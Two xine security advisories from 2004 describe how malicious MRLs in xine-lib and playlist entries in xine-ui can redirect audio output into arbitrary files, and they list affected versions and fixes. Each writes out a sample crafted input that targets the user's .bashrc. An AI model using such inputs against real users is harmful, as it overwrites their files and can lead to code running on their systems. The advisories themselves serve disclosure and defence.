                                                                                 
xine security announcement
==========================
                                                                                 
Announcement-ID: XSA-2004-1
                                                                                 
Summary:
By opening a malicious MRL in any xine-lib based media player, an attacker can
write arbitrary content to an arbitrary file, only restricted by the
permissions of the user running the application.
                                                                                 
Description:
MRLs (media resource locator) are a subset of URIs used by the xine-lib
library to describe the location of the content to play. MRLs also offer the
feature of providing xine configuration options, which will be activated
right before the addressed content is played. But some of xine's
configuration options specify files that will be written to during playback.
One example of such an option is "audio.sun_audio_device", which specifies
the audio device on SUN machines. The decoded PCM samples of the audio stream
will be written to this file. By having a user open a MRL like
"http://myserver/mybashrc#audio.sun_audio_device:.bashrc" in xine, which
changes the value of the "audio.sun_audio_device" option and plays a
specially crafted audio stream, an attacker could fill any file the user has
access to with arbitrary content. Other configuration options that allow such
an attack exist (we also found "dxr3.devicename"), so the vulnerability is
not limited to SUN machines.
                                                                                 
Severity:
Expoits have not been seen in the public and not all xine setups use the
vulnerable configuration options. But at least xine users on SUN machines and
users of a DXR3 or Hollywood+ MPEG decoder card are vulnerable. Other such
problematic configuration options might have slipped through the review or
might be provided by xine plugins outside the main xine distribution, leaving
other users vulnerable as well. Given the wide range of possible harm, we
consider this problem to be highly critical.
                                                                                 
Affected versions:
All 1-alpha releases.
All 1-beta releases.
All 1-rc releases up to and including 1-rc3a.
                                                                                 
Unaffected versions:
All 0.9 releases or older.
1-rc3b or newer.
                                                                                 
Solution:
Changes to xine configuration options via MRL are now disabled by default.
The attached patch to xine-lib fixes the problem but should only be used by
distributors who do not want to upgrade. Otherwise, we strongly advise
everyone to upgrade to the 1-rc3c release of xine-lib.
                                                                                 
For further information and in case of questions, please contact the xine
team. Our website is http://xinehq.de/

Announcement-ID: XSA-2004-2
                                                                                 
Summary:
By opening a malicious playlist in the xine-ui media player, an attacker can
write arbitrary content to an arbitrary file, only restricted by the
permissions of the user running xine-ui.
                                                                                 
Description:
xine-ui offers the feature of embedding special items in playlists that will
apply changes to xine configuration options once the playlist item is played.
But some of xine's configuration options specify files that will be written
to during playback. One example of such an option is
"audio.sun_audio_device", which specifies the audio device on SUN machines.
The decoded PCM samples of the audio stream will be written to this file. By
having a user open a playlist with an entry
"cfg:/audio.sun_audio_device:.bashrc" followed by an entry
"http://myserver/mybashrc" in xine-ui, the value of the
"audio.sun_audio_device" option will be changed and the next entry will play
a specially crafted audio stream. This way an attacker could fill any file
the user has access to with arbitrary content. Other configuration options
that allow such an attack exist (we also found "dxr3.devicename"), so the
vulnerability is not limited to SUN machines.
                                                                                 
Severity:
Expoits have not been seen in the public and not all xine setups use the
vulnerable configuration options. But at least xine users on SUN machines and
users of a DXR3 or Hollywood+ MPEG decoder card are vulnerable. Other such
problematic configuration options might have slipped through the review or
might be provided by xine plugins outside the main xine distribution, leaving
other users vulnerable as well. Given the wide range of possible harm, we
consider this problem to be highly critical.
                                                                                 
Affected versions:
All releases starting with 0.9.21 up to and including 0.9.23.
                                                                                 
Unaffected versions:
All releases older than 0.9.21.
CVS HEAD has been fixed.
The upcoming 0.99.1 release.
                                                                                 
Solution:
Changes to xine configuration options via playlist are now disabled by
default.
The attached patch to xine-ui fixes the problem but should only be used by
distributors who do not want to upgrade. Otherwise, we strongly advise
everyone to upgrade to CVS HEAD or to the next version of xine-ui, which is
to be released soon.
                                                                                 
For further information and in case of questions, please contact the xine
team. Our website is http://xinehq.de/